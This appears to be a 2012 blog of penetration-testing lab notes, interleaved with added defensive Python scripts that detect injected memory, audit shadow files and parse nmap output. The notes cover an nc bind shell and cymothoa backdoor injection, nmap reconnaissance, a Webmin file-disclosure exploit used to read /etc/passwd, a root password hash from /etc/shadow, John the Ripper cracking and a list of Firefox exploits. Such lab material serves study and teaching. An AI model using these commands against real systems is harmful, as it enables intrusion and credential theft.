Monday, 30 January 2012

Using cymothoa on Ubuntu

To use cymothoa on Ubuntu, the steps are:
1. Use Nessus to get the port and PID number, which we use in this command:
    #nc -l -v -p (the port) -e > cy /bin/bash

    But unfortunately I can't use my Nessus; some trouble happened with my web browser (unable to connect / problem loading page), so I can't get the information from the Nessus report about the port and PID number that I can use. (see the picture)

If we can get the port number from Nessus, then the next step is
root@bt:/pentest/backdoors/cymothoa# ./cymothoa -p (PID number) -s 0 -y (port number)
If the command succeeds, the Ubuntu machine will be infected.
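cymothoa's -p option names the PID of an already running process, into which the tool injects its backdoor (that is the tool's documented purpose; the notes above only say the host ends up infected). As an added example, not part of the original notes, the following Python script shows the check a defender would run on such a host: parse /proc/<pid>/maps and report anonymous memory regions that are both writable and executable, which is the footprint injected code usually leaves. The maps text is a constructed sample in /proc format, not captured from a real machine; scan_live() applies the same logic to the real /proc tree and needs root to read other users' processes.

```python
import re
from pathlib import Path

# One /proc/<pid>/maps line: address range, permissions, offset, device,
# inode and an optional path (empty for anonymous mappings).
MAPS_LINE_RE = re.compile(
    r"^(?P<start>[0-9a-f]+)-(?P<end>[0-9a-f]+)\s+(?P<perms>[rwxps-]{4})\s+"
    r"(?P<offset>[0-9a-f]+)\s+(?P<dev>[0-9a-f]+:[0-9a-f]+)\s+(?P<inode>\d+)\s*(?P<path>.*)$"
)

# Constructed sample (not captured from a real host): a 32-bit sshd image
# plus one anonymous region mapped rwx, as injected shellcode would need.
SAMPLE_MAPS = """\
08048000-08052000 r-xp 00000000 08:01 393252     /usr/sbin/sshd
08052000-08053000 rw-p 00009000 08:01 393252     /usr/sbin/sshd
09a1c000-09a3d000 rw-p 00000000 00:00 0          [heap]
b7e2a000-b7fcd000 r-xp 00000000 08:01 131204     /lib/i386-linux-gnu/libc-2.13.so
b7fcd000-b7fcf000 rw-p 001a3000 08:01 131204     /lib/i386-linux-gnu/libc-2.13.so
b7fe5000-b7fe6000 rwxp 00000000 00:00 0
bffdf000-c0000000 rw-p 00000000 00:00 0          [stack]
"""


def parse_maps(text):
    """Turn maps text into a list of region dicts; unparsable lines are skipped."""
    regions = []
    for line in text.splitlines():
        m = MAPS_LINE_RE.match(line.strip())
        if not m:
            continue
        regions.append({
            "start": int(m.group("start"), 16),
            "end": int(m.group("end"), 16),
            "perms": m.group("perms"),
            "inode": int(m.group("inode")),
            "path": m.group("path").strip(),
        })
    return regions


def suspicious_regions(regions):
    """Anonymous mappings (inode 0, no file, not [heap]/[stack]) that are
    both writable and executable. A normal process image keeps code r-x
    and data rw-; an rwx region backed by no file is worth inspecting."""
    return [
        r for r in regions
        if "w" in r["perms"] and "x" in r["perms"]
        and r["inode"] == 0 and not r["path"].startswith("[")
    ]


def scan_live(proc_root="/proc"):
    """Apply the same check to every readable /proc/<pid>/maps and return
    {pid: [regions]} for processes with at least one hit."""
    hits = {}
    for pid_dir in Path(proc_root).glob("[0-9]*"):
        try:
            text = (pid_dir / "maps").read_text()
        except OSError:          # PermissionError is an OSError: skip it
            continue
        found = suspicious_regions(parse_maps(text))
        if found:
            hits[int(pid_dir.name)] = found
    return hits


if __name__ == "__main__":
    for r in suspicious_regions(parse_maps(SAMPLE_MAPS)):
        print(f"rwx anonymous region {r['start']:08x}-{r['end']:08x} "
              f"({r['end'] - r['start']} bytes)")
    for pid, regions in scan_live().items():
        print(f"pid {pid}: {len(regions)} rwx anonymous region(s)")
```

JIT runtimes (Java, browsers, some interpreters) legitimately create rwx anonymous regions, so treat a hit as a lead to examine (dump the region, compare the process against its package) rather than as proof of injection.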




Privilege Escalation


1. Scan with nmap to get the information
root@BT:~# nmap -v -A 192.168.0.112

Discovered open port 445/tcp on 192.168.0.112
Discovered open port 80/tcp on 192.168.0.112
Discovered open port 22/tcp on 192.168.0.112
Discovered open port 139/tcp on 192.168.0.112
Discovered open port 10000/tcp on 192.168.0.112

From the information above, we got 5 open ports, which we can use in the next steps.
We can try to open 192.168.0.112:10000 in the web browser.


2. In this step, use exploitdb:
  root@BT:~# cd /pentest/exploits/exploitdb/

3. Type ls to list the directory
  root@BT:/pentest/exploits/exploitdb# ls
  files.csv  platforms  searchsploit

4. Next, run ./searchsploit webmin to find the Webmin exploit files
  root@BT:/pentest/exploits/exploitdb# ./searchsploit webmin
  Description                                                                 Path
--------------------------------------------------------------------------- -------------------------
Webmin BruteForce and Command Execution Exploit                             /multiple/remote/705.pl
Webmin Web Brute Force v1.5 (cgi-version)                                   /multiple/remote/745.cgi
Webmin BruteForce + Command Execution v1.5                                  /multiple/remote/746.pl
Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit          /multiple/remote/1997.php
Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit (perl)   /multiple/remote/2017.pl
phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability              /php/webapps/2451.txt
phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability              /php/webapps/2451.txt
phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities             /php/webapps/2462.txt
phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities             /php/webapps/2462.txt
phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities             /php/webapps/2462.txt

5. Copy the Perl file 2017.pl by typing cp platforms/multiple/remote/2017.pl ~
  root@BT:/pentest/exploits/exploitdb# cp platforms/multiple/remote/2017.pl ~

6. Go back to the home directory by typing cd
  root@BT:/pentest/exploits/exploitdb# cd

7. List the contents of the home folder
  root@BT:~# ls
  2017.pl                          NessusReport21.rtf  NessusReport45.rtf  subnet
  Desktop                          NessusReport26.rtf  NessusReport63.rtf  VirtualBox VMs
  download                         NessusReport27.rtf  NessusReport65.rtf  workspace
  galau.ps                         NessusReport32.rtf  NessusReport66.rtf  xpreport.rtf
  galau.txt                        NessusReport35.rtf  NessusReport67.rtf
  IS2C                             NessusReport40.rtf  NessusReport70.rtf
  Nessus-4.4.1-ubuntu910_i386.deb  NessusReport44.rtf  NessusReport.rtf

8. Look at the usage of 2017.pl
  root@BT:~# perl 2017.pl
  Usage: 2017.pl <url> <port> <filename> <target>
  TARGETS are
  0  - > HTTP
  1  - > HTTPS
  Define full path with file name
  Example: ./webmin.pl blah.com 10000 /etc/passwd
  root@BT:~# perl 2017.pl 192.168.0.112 10000
  Usage: 2017.pl <url> <port> <filename> <target>
  TARGETS are
  0  - > HTTP
  1  - > HTTPS
  Define full path with file name
  Example: ./webmin.pl blah.com 10000 /etc/passwd

9. Retrieve the user name and password file (/etc/passwd) by typing: perl 2017.pl http://192.168.0.112 10000 /etc/passwd 0
root@BT:~# perl 2017.pl http://192.168.0.112 10000 /etc/passwd 0
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking http://192.168.0.112 on port 10000!
FILENAME:  /etc/passwd

 FILE CONTENT STARTED
 -----------------------------------

 -------------------------------------

10. Show all the user names and password hashes in the shadow file by typing: cat /etc/shadow
   root@BT:~# cat /etc/shadow
   root:$6$0qQlDJcx$T3ZDddWlo4qXZoPI7gxOIuJHgw3/8gGF6ti3RUGAc0pLD2HOJFGAaExAjRTDwrWWmY5U2/U0M8rIt1yz554PY/:15362:0:99999:7:::
daemon:x:15362:0:99999:7:::
bin:x:15362:0:99999:7:::
sys:x:15362:0:99999:7:::
sync:x:15362:0:99999:7:::
games:x:15362:0:99999:7:::
man:x:15362:0:99999:7:::
lp:x:15362:0:99999:7:::
mail:x:15362:0:99999:7:::
news:x:15362:0:99999:7:::
uucp:x:15362:0:99999:7:::
proxy:x:15362:0:99999:7:::
www-data:x:15362:0:99999:7:::
backup:x:15362:0:99999:7:::
list:x:15362:0:99999:7:::
irc:x:15362:0:99999:7:::
gnats:x:15362:0:99999:7:::
libuuid:x:15362:0:99999:7:::
syslog:x:15362:0:99999:7:::
sshd:x:15362:0:99999:7:::
landscape:x:15362:0:99999:7:::
messagebus:x:15362:0:99999:7:::
nobody:x:15362:0:99999:7:::
mysql:!:15362:0:99999:7:::
avahi:*:15362:0:99999:7:::
snort:*:15362:0:99999:7:::
statd:*:15362:0:99999:7:::
haldaemon:*:15362:0:99999:7:::
kdm:*:15362:0:99999:7:::
festival:*:15362:0:99999:7:::
usbmux:*:15362:0:99999:7:::
postgres:!:15362:0:99999:7:::
privoxy:*:15362:0:99999:7:::
debian-tor:*:15362:0:99999:7:::
clamav:!:15362:0:99999:7:::




Using John The Ripper


Use John the Ripper to crack the password

To get the password file from the shadow file I use this command:
1.      # cd /pentest/passwords/jtr
# ./unshadow /etc/passwd /etc/shadow > pass
root:$6$0qQlDJcx$T3ZDddWlo4qXZoPI7gxOIuJHgw3/8gGF6ti3RUGAc0pLD2HOJFGAaExAjRTDwrWWmY5U2/U0M8rIt1yz554PY/:15362:0:99999:7:::


2.      Then to crack the password file, I give this command below:
# ./john pass
3.      Then to see the password
# ./john --show pass
But it did not work, I have tried it.... I don't know where the mistake is!
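As an added example, not part of the original notes, the following Python script shows what unshadow does (it replaces the x placeholder in each /etc/passwd entry with the hash from the matching /etc/shadow entry, producing the single-file format john reads) and audits the shadow entries the way a defender reviewing the listing above would: which accounts carry a real, active hash (the only lines john spends time on), which are locked or have no hash at all, which use a weak algorithm, and when each password was last changed (field 3 is days since 1970-01-01, so 15362 is 2012-01-23). The passwd and shadow samples are constructed; the root line reuses the hash shown above, and the 365-day age threshold is an assumed policy value. Note the prompt on that listing: it was taken on the BackTrack machine itself (root@BT:~#), not on the 192.168.0.112 target.

```python
from datetime import date, timedelta

EPOCH = date(1970, 1, 1)      # shadow field 3 counts days from this date
MAX_AGE_DAYS = 365            # assumed policy threshold for this example

# Crypt-style prefixes in the hash field -> (algorithm name, weak?).
HASH_ALGORITHMS = {
    "$1$": ("md5crypt", True),                       # fast to brute force offline
    "$2a$": ("bcrypt", False), "$2b$": ("bcrypt", False), "$2y$": ("bcrypt", False),
    "$5$": ("sha256crypt", False),
    "$6$": ("sha512crypt", False),                   # the root entry above uses this
    "$y$": ("yescrypt", False),
}

# Constructed samples in /etc/passwd and /etc/shadow format. The root hash is
# the one shown in the listing above; every other line is made up.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
mysql:x:105:113:MySQL Server,,,:/var/lib/mysql:/bin/false
avahi:x:106:115:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
legacy:x:1001:1001:old admin account:/home/legacy:/bin/bash
guest:x:1002:1002:guest:/home/guest:/bin/bash
"""

SAMPLE_SHADOW = """\
root:$6$0qQlDJcx$T3ZDddWlo4qXZoPI7gxOIuJHgw3/8gGF6ti3RUGAc0pLD2HOJFGAaExAjRTDwrWWmY5U2/U0M8rIt1yz554PY/:15362:0:99999:7:::
daemon:x:15362:0:99999:7:::
www-data:x:15362:0:99999:7:::
mysql:!:15362:0:99999:7:::
avahi:*:15362:0:99999:7:::
legacy:$1$Zx9Qk2aB$1Gq7UvJ4o0F2dT8kLh6yS/:14000:0:99999:7:::
guest::15362:0:99999:7:::
"""


def rate_hash(hashval):
    """(algorithm, weak) for a crypt string; 13 chars with no '$' is old DES."""
    for prefix, rating in HASH_ALGORITHMS.items():
        if hashval.startswith(prefix):
            return rating
    if len(hashval) == 13 and "$" not in hashval:
        return ("descrypt", True)
    return ("unknown", False)


def classify_password_field(pwfield):
    """(state, algorithm, weak) for the second field of a shadow entry."""
    if pwfield == "":
        return ("empty", "-", True)
    if pwfield in ("!", "!!", "*", "x"):        # no hash: password login impossible
        return ("no usable hash", "-", False)
    if pwfield.startswith("!"):                 # locked, old hash kept after the '!'
        return ("locked (hash retained)",) + rate_hash(pwfield[1:])
    return ("active",) + rate_hash(pwfield)


def unshadow(passwd_text, shadow_text):
    """What john's unshadow does: put each shadow hash into the passwd line."""
    hashes = {}
    for line in shadow_text.splitlines():
        if line and not line.startswith("#"):
            name, pwfield = line.split(":")[:2]
            hashes[name] = pwfield
    merged = []
    for line in passwd_text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        fields[1] = hashes.get(fields[0], fields[1])
        merged.append(":".join(fields))
    return merged


def audit_shadow(shadow_text, today):
    """One dict per entry: state, algorithm, last change date, age and issues."""
    results = []
    for line in shadow_text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        name, pwfield, lastchg = line.split(":")[:3]
        state, algo, weak = classify_password_field(pwfield)
        changed = EPOCH + timedelta(days=int(lastchg)) if lastchg else None
        age = (today - changed).days if changed else None
        issues = []
        if state == "empty":
            issues.append("empty password field: login without a password")
        if state == "active" and weak:
            issues.append(f"weak hash algorithm {algo}: cheap to crack offline")
        if state == "active" and age is not None and age > MAX_AGE_DAYS:
            issues.append(f"password unchanged for {age} days")
        results.append({"user": name, "state": state, "algorithm": algo,
                        "last_change": changed, "age_days": age, "issues": issues})
    return results


def crackable_users(shadow_text):
    """Accounts with a real, active hash: the only lines john works on."""
    return [r["user"] for r in audit_shadow(shadow_text, EPOCH) if r["state"] == "active"]


if __name__ == "__main__":
    for row in audit_shadow(SAMPLE_SHADOW, date(2012, 1, 30)):
        print(f"{row['user']:<9} {row['state']:<22} {row['algorithm']:<12} "
              f"{row['last_change']}  {'; '.join(row['issues'])}")
    print("john candidates:", crackable_users(SAMPLE_SHADOW))
```

Run against a real pair of files, the audit is the quick way to see why john reports nothing for most entries: lines with x, * or ! carry no hash to crack, and an empty field is a finding on its own because no cracking is needed to log in.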

Friday, 27 January 2012

Using Nessus for service enumeration


- Service Enumeration
1. Using Nessus
- open Nessus: https://localhost:8834
- enter the user name and password
- choose the Scan menu and click the Add button
- fill in the name, type, policy and scan target
- after the scan is complete, click Reports to see the gathered information
- click Host
- click Total
- click High, then click the numbers and click one of the Show entries
- click Medium
- click Open Port
- download the report and change the file extension.



1. Scanning with nmap
- scan by typing:
root@BT:~# nmap -v -A 192.168.56.101

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-01-27 16:57 WIT
NSE: Loaded 87 scripts for scanning.
NSE: Script Pre-scanning.
Initiating ARP Ping Scan at 16:57
Scanning 192.168.56.101 [1 port]
Completed ARP Ping Scan at 16:57, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 16:57
Completed Parallel DNS resolution of 1 host. at 16:57, 13.00s elapsed
Initiating SYN Stealth Scan at 16:57
Scanning 192.168.56.101 [1000 ports]
Discovered open port 135/tcp on 192.168.56.101
Discovered open port 139/tcp on 192.168.56.101
Discovered open port 445/tcp on 192.168.56.101
Completed SYN Stealth Scan at 16:57, 1.22s elapsed (1000 total ports)
Initiating Service scan at 16:57
Scanning 3 services on 192.168.56.101
Completed Service scan at 16:57, 6.01s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against 192.168.56.101
NSE: Script scanning 192.168.56.101.
Initiating NSE at 16:57
Completed NSE at 16:57, 0.20s elapsed
Nmap scan report for 192.168.56.101
Host is up (0.00068s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds
MAC Address: 08:00:27:41:74:C0 (Cadmus Computer Systems)
Device type: general purpose
Running: Microsoft Windows XP
OS CPE: cpe:/o:microsoft:windows_xp
OS details: Microsoft Windows XP SP2 or SP3
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| nbstat:
|   NetBIOS name: IS2C-6C66D0BB8D, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:41:74:c0 (Cadmus Computer Systems)
|   Names
|     IS2C-6C66D0BB8D<00>  Flags: <unique><active>
|     WORKGROUP<00>        Flags: <group><active>
|     IS2C-6C66D0BB8D<20>  Flags: <unique><active>
|_    WORKGROUP<1e>        Flags: <group><active>
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-security-mode:
|   Account that was used for smb scripts: guest
|   User-level authentication
|   SMB Security: Challenge/response passwords supported
|_  Message signing disabled (dangerous, but default)
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|   Computer name: is2c-6c66d0bb8d
|   NetBIOS computer name: IS2C-6C66D0BB8D
|   Workgroup: WORKGROUP
|_  System time: 2012-01-27 16:57:45 UTC+7

TRACEROUTE
HOP RTT     ADDRESS
1   0.68 ms 192.168.56.101

NSE: Script Post-scanning.
Read data files from: /usr/local/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.08 seconds
           Raw packets sent: 1098 (49.010KB) | Rcvd: 1017 (41.234KB)

- root@BT:~# nmap -v -IR 192.168.56.101
WARNING: identscan (-I) no longer supported.  Ignoring -I

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-01-27 17:14 WIT
Initiating ARP Ping Scan at 17:14
Scanning 192.168.56.101 [1 port]
Completed ARP Ping Scan at 17:14, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 17:14
Completed Parallel DNS resolution of 1 host. at 17:15, 13.00s elapsed
Initiating SYN Stealth Scan at 17:15
Scanning 192.168.56.101 [1000 ports]
Discovered open port 135/tcp on 192.168.56.101
Discovered open port 445/tcp on 192.168.56.101
Discovered open port 139/tcp on 192.168.56.101
Completed SYN Stealth Scan at 17:15, 1.20s elapsed (1000 total ports)
Nmap scan report for 192.168.56.101
Host is up (0.00088s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:27:41:74:C0 (Cadmus Computer Systems)

Read data files from: /usr/local/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 14.41 seconds
           Raw packets sent: 1082 (47.592KB) | Rcvd: 1001 (40.040KB)
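As an added example, not part of the original notes, the following Python script parses the kind of nmap text output shown in this section and in the 192.168.0.112 scan earlier on the page: the "Discovered open port" lines that -v prints while scanning, the PORT/STATE/SERVICE table, the OS details line, and the NSE host script results. It then flags the SMB findings a defender should act on (message signing disabled, SMBv1 only, scripts able to run as guest). The embedded sample is a trimmed copy of the nmap -v -A output above; the hardening notes attached to each finding are this example's wording, not nmap's.

```python
import re
from dataclasses import dataclass, field

# Constructed sample: a trimmed copy of the nmap -v -A output shown above
# (same host, same ports, same host-script findings; timing lines removed).
SAMPLE_NMAP_OUTPUT = """\
Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-01-27 16:57 WIT
Discovered open port 135/tcp on 192.168.56.101
Discovered open port 139/tcp on 192.168.56.101
Discovered open port 445/tcp on 192.168.56.101
Nmap scan report for 192.168.56.101
Host is up (0.00068s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds
MAC Address: 08:00:27:41:74:C0 (Cadmus Computer Systems)
OS details: Microsoft Windows XP SP2 or SP3

Host script results:
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-security-mode:
|   Account that was used for smb scripts: guest
|   User-level authentication
|   SMB Security: Challenge/response passwords supported
|_  Message signing disabled (dangerous, but default)
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|_  System time: 2012-01-27 16:57:45 UTC+7

Nmap done: 1 IP address (1 host up) scanned in 23.08 seconds
"""

DISCOVERED_RE = re.compile(r"^Discovered open port (\d+)/(tcp|udp) on (\S+)$")
REPORT_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_ROW_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")
OS_RE = re.compile(r"^OS details: (.*)$")

# Substrings of nmap's own host-script output that a defender should act on,
# mapped to a hardening note (the notes are this example's wording).
RISKY_SCRIPT_FINDINGS = {
    "Message signing disabled": "enable SMB message signing; unsigned sessions can be relayed or tampered with",
    "doesn't support SMBv2": "host speaks SMBv1 only; isolate or retire it",
    "Account that was used for smb scripts: guest": "scripts ran as guest; disable guest/null-session access",
}


@dataclass
class HostReport:
    address: str = ""
    os_details: str = ""
    open_ports: dict = field(default_factory=dict)  # "445/tcp" -> service name
    versions: dict = field(default_factory=dict)    # "445/tcp" -> VERSION column
    findings: list = field(default_factory=list)    # (script line, hardening note)


def parse_nmap(text):
    """Parse normal or verbose nmap text output for a single host.

    Reads both the 'Discovered open port' lines that -v prints during the
    scan and the PORT/STATE/SERVICE table, so a port is recorded even when
    a captured log contains only one of the two forms."""
    report = HostReport()
    for raw in text.splitlines():
        line = raw.rstrip()
        m = DISCOVERED_RE.match(line)
        if m:
            report.address = m.group(3)
            report.open_ports.setdefault(f"{m.group(1)}/{m.group(2)}", "")
            continue
        m = REPORT_RE.match(line)
        if m:
            report.address = m.group(1)
            continue
        m = PORT_ROW_RE.match(line)
        if m:
            if m.group(3) == "open":
                key = f"{m.group(1)}/{m.group(2)}"
                report.open_ports[key] = m.group(4)
                if m.group(5):
                    report.versions[key] = m.group(5).strip()
            continue
        m = OS_RE.match(line)
        if m:
            report.os_details = m.group(1)
            continue
        if line.startswith("|"):                       # NSE script output
            body = line.lstrip("|_ ").strip()
            for marker, note in RISKY_SCRIPT_FINDINGS.items():
                if marker in body:
                    report.findings.append((body, note))
    return report


def summarize(report):
    """Readable lines: host, one per open port (by number), one per finding."""
    lines = [f"{report.address}: {report.os_details or 'OS unknown'}"]
    for port in sorted(report.open_ports, key=lambda p: int(p.split('/')[0])):
        service = report.open_ports[port] or "?"
        version = report.versions.get(port, "")
        lines.append(f"  {port:<9} {service:<14} {version}".rstrip())
    for body, note in report.findings:
        lines.append(f"  FINDING: {body} -> {note}")
    return lines


if __name__ == "__main__":
    print("\n".join(summarize(parse_nmap(SAMPLE_NMAP_OUTPUT))))
```

The same parser handles the plain `nmap 192.168.0.67` style output at the end of the page, where there are no "Discovered" lines and the address comes only from the "Nmap scan report for" line.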


- Vulnerability Analysis
1. Using exploitdb
root@BT:~# cd /pentest/exploits/exploitdb
root@BT:/pentest/exploits/exploitdb#  ./searchsploit firefox
 Description                                                                 Path
--------------------------------------------------------------------------- -------------------------
Mozilla Firefox Install Method Remote Arbitrary Code Execution Exploit      /windows/remote/986.html
Mozilla Firefox view-source:javascript url Code Execution Exploit           /multiple/remote/1007.html
Mozilla FireFox <= 1.0.1 Remote GIF Heap Overflow Exploit                   /windows/remote/1089.c
Mozilla Firefox <= 1.0.4 ""Set As Wallpaper"" Code Execution Exploit        /windows/remote/1102.html
Mozilla Firefox <= 1.0.7 Integer Overflow Denial of Service Exploit         /multiple/dos/1233.html
Mozilla (Firefox <= 1.0.7) (Thunderbird <= 1.0.6) Denial of Service Exploit /multiple/dos/1253.html
Mozilla (Firefox <= 1.0.7) (Mozilla <= 1.7.12) Denial of Service Exploit    /multiple/dos/1257.html
Mozilla Firefox <= 1.5 (history.dat) Looping Vulnerability PoC              /windows/dos/1362.html
Mozilla Firefox <= 1.04 compareTo() Remote Code Execution Exploit           /multiple/remote/1369.html
Mozilla Firefox 1.5 location.QueryInterface() Code Execution (linux)        /linux/remote/1474.pm
Mozilla Firefox 1.5 location.QueryInterface() Code Execution (osx)          /osX/remote/1480.pm
Mozilla Firefox <= 1.5.0.1                                                  /multiple/dos/1667.html
Mozilla Firefox <= 1.5.0.2 (js320.dll/xpcom_core.dll) Denial of Service PoC /multiple/dos/1716.html
Mozilla Firefox <= 1.5.0.3 (Loop) Denial of Service Exploit                 /multiple/dos/1802.html
Mozilla Firefox <= 1.5.0.4 (marquee) Denial of Service Exploit              /multiple/dos/1867.html
Mozilla Firefox <= 1.5.0.4 Javascript Navigator Object Code Execution PoC   /multiple/remote/2082.html
Mozilla Firefox <= 1.5.0.6 (FTP Request) Remote Denial of Service Exploit   /multiple/dos/2244.pl
Mozilla Firefox <= 1.5.0.7/ 2.0 (createRange) Remote DoS Exploit            /multiple/dos/2695.html
Mozilla Firefox <= 2.0.0.1 (location.hostname) Cross-Domain Vulnerability   /windows/remote/3340.html
Mozilla Firefox 2.0.0.3 / Gran Paradiso 3.0a3 DoS Hang / Crash Exploit      /multiple/dos/3606.py
Mozilla Firefox <= 2.0.0.7 Remote Denial of Service Exploit                 /multiple/dos/4559.txt
Mozilla Firefox 3.0.3 User Interface Null Pointer Dereference Crash         /windows/dos/6614.html
Skype extension for Firefox BETA 2.2.0.95 Clipboard Writing Vulnerability   /windows/remote/6690.html
Mozilla Firefox 3.0.5 location.hash Remote Crash Exploit                    /windows/dos/7554.pl
Mozilla Firefox 3.0.5 location.hash Remote Crash Exploit                    /windows/dos/7554.pl
Firefox 3.0.5 Status Bar Obfuscation / Clickjacking                         /windows/remote/7842.html
Mozilla Firefox 3.0.6 (BODY onload) Remote Crash Exploit                    /multiple/dos/8091.html
Mozilla Firefox 3.0.7 OnbeforeUnLoad DesignMode Dereference Crash           /multiple/dos/8219.html
Mozilla Firefox XSL Parsing Remote Memory Corruption PoC 0day               /multiple/dos/8285.txt
Firefox 3.0.x (XML Parser) Memory Corruption / DoS PoC                      /windows/dos/8306.txt
Mozilla Firefox XSL Parsing Remote Memory Corruption PoC #2                 /windows/dos/8356.txt
Mozilla Firefox (unclamped loop) Denial of Service Exploit                  /multiple/dos/8794.htm
Mozilla Firefox 3.0.10 (KEYGEN) Remote Denial of Service Exploit            /multiple/dos/8822.txt
DX Studio Player < 3.0.29.1 Firefox plug-in Command Injection Vuln          /windows/remote/8922.txt
Mozilla Firefox 3.5 (Font tags) Remote Buffer Overflow Exploit              /windows/remote/9137.html
Mozilla Firefox 3.5 (Font tags) Remote Buffer Overflow Exploit              /windows/remote/9137.html
Mozilla Firefox 3.5 unicode Remote Buffer Overflow PoC                      /windows/dos/9158.html
Mozilla Firefox 3.5 (Font tags) Remote Heap Spray Exploit                   /windows/remote/9181.py
Mozilla Firefox 3.5 (Font tags) Remote Heap Spray Exploit (pl)              /windows/remote/9214.pl
Mozilla Firefox 3.5 (Font tags) Remote Buffer Overflow Exploit (osx)        /osX/remote/9247.py
Mozilla Firefox < 3.0.14 Multiplatform RCE via pkcs11.addmodule             /multiple/remote/9651.txt
Mozilla Firefox 2.0.0.16 UTF-8 URL Remote Buffer Overflow Exploit           /windows/remote/9663.py
Firefox 3.5.3 local download manager temp file creation                     /windows/local/9882.txt
Mozilla Suite/Firefox < 1.5.0.5 Navigator Object Code Execution             /multiple/remote/9946.rb
Mozilla Suite/Firefox < 1.0.5 compareTo Code Execution                      /windows/remote/9947.rb
Firefox 3.5 escape Memory Corruption Exploit                                /multiple/remote/9949.rb
Firefox + Adobe Memory Corruption PoC                                       /windows/dos/10208.txt
Mozilla Firefox Location Bar Spoofing Vulnerability                         /multiple/local/10544.html
Firefox 3.6 (XML parser) Memory Corruption PoC/DoS                          /windows/dos/11245.txt
Mozilla Firefox 3.6 (Multitudinous looping )Denial of Service Exploit       /windows/dos/11432.txt
Mozilla Firefox v3.6 URL Spoofing Vulnerability                             /multiple/local/11561.html
Mozilla Firefox <= 3.6 Denial Of Service Exploit                            /multiple/dos/11590.php
Mozilla Firefox v3.6 and Opera Long String Crash(0day) Exploit              /windows/dos/11617.txt
Firefox 3.6.3 Fork Bomb DoS                                                 /windows/dos/12492.html
Firefox 3.6.3 & Safari 4.0.5 - Access Violation Exception and Unknown Exception /windows/dos/12602.txt
Firefox 3.6.3 (latest) <= memory exhaustion crash vulnerabilities           /windows/dos/12678.txt
Firefox <= 3.6.8 DLL Hijacking Exploit (dwmapi.dll)                         /windows/local/14730.c
MOAUB #9 - Mozilla Firefox XSLT Sort Remote Code Execution Vulnerability    /windows/dos/14949.py
MOAUB #17 - Firefox Plugin Parameter EnsureCachedAttrParamArrays Remote Code Execution /windows/dos/15027.py
MOAUB #25 - Mozilla Firefox CSS font-face Remote Code Execution Vulnerability /windows/dos/15104.py
Firefox 3.5.10 & 3.6.6 WMP Memory Corruption Using Popups                   /windows/dos/15242.html
Firefox Interleaving document.write and appendChild Denial of Service       /multiple/dos/15341.html
Firefox Memory Corruption Proof of Concept (Simplified)                     /multiple/dos/15342.html
Firefox 3.6.8 - 3.6.11 Interleaving document.write and appendChild Exploit (From the Wild) /windows/remote/15352.html
Mozilla Firefox <= 3.6.12 Remote Denial Of Service                          /multiple/dos/15498.html
Firefox 3.5 escape() Return Value Memory Corruption                         /multiple/remote/16299.rb
Mozilla Suite/Firefox Navigator Object Code Execution                       /multiple/remote/16300.rb
Firefox location.QueryInterface() Code Execution                            /multiple/remote/16301.rb
Mozilla Suite/Firefox InstallVersion->compareTo() Code Execution            /windows/remote/16306.rb
Mozilla Firefox Interleaving document.write and appendChild Exploit         /windows/remote/16509.rb
Mozilla Firefox ""nsTreeRange"" Dangling Pointer Exploit                    /windows/remote/17419.zip
Mozilla Firefox ""nsTreeRange"" Dangling Pointer Vulnerability              /windows/remote/17520.rb
Firefox 3.6.16 OBJECT mChannel Remote Code Execution Exploit (DEP bypass)   /windows/remote/17612.rb
Mozilla Firefox 3.6.16 mChannel use after free vulnerability                /windows/remote/17650.rb
Mozilla Firefox 3.6.16 mChannel Object Use After Free Exploit (Win7)        /windows/remote/17672.html
Mozilla Firefox Array.reduceRight() Integer Overflow Exploit                /windows/remote/17974.html
Mozilla Firefox Array.reduceRight() Integer Overflow                        /windows/remote/17976.rb
Firefox 8.0 Null Pointer Dereference PoC                                    /multiple/dos/18116.html


root@BT:/pentest/exploits/exploitdb# cat platforms/windows/remote/20.txt
##########################################
